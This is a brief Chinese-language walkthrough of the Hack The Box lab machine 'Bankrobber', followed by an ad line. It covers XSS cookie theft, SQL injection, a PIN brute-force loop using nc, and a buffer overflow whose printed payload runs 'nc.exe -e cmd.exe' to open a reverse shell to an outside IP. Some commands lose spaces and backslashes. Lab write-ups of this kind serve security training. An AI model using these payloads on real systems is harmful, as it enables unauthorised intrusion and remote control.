Hackthebox——Bankrobber

nmap扫描到80、443、445、3306

web上可注册账号,注册后登陆,看到一个TransferE-coin的功能。

随便填了一点信息发送,提示管理员会看这个请求。

抓到这个请求,看到cookie这里是用户名和密码的base64加密,想到通过xss获得管理员的cookie来得到管理员的用户名密码。

构造payload后发包,成功获得管理员cookie,解密后获得管理员密码,成功登陆管理员账号。

登陆管理员账号后,第一个看到note.txt,告诉我们网站的路径。

页面最下面有个backdoorchecker,试试执行命令,提示我们只能在localhost执行。

页面中间有个搜索user的功能,测试后发现存在sql注入。

注入查看到backdoorchecker.php的源码。从源码内容中可知要执行命令只能从本地发送请求,前三个字符必须是dir。

结合之前那个xss的漏洞,构造一个反弹shell的payload,发送后成功反弹sehll,获得user.txt。

尝试了几个提权方法都没成功,后来在C盘根目录下看到一个可疑的程序,并且这个程序正在运行

转发端口到本地,nc连接本地910端口,提示需要4位的PIN码

forn in {0..9}{0..9}{0..9}{0..9};do echo $n;echo $n | nc -nv 127.0.0.1910; done

爆破得到PIN码,连接后测试发现输入e-coins存在溢出

利用溢出成功获得system权限,获得root.txt。

12345678901234567890123456789012C:UsersCortinnc.exe-e cmd.exe 10.10.14.149 4447

VirMach 便宜 VPS

QNews

QNews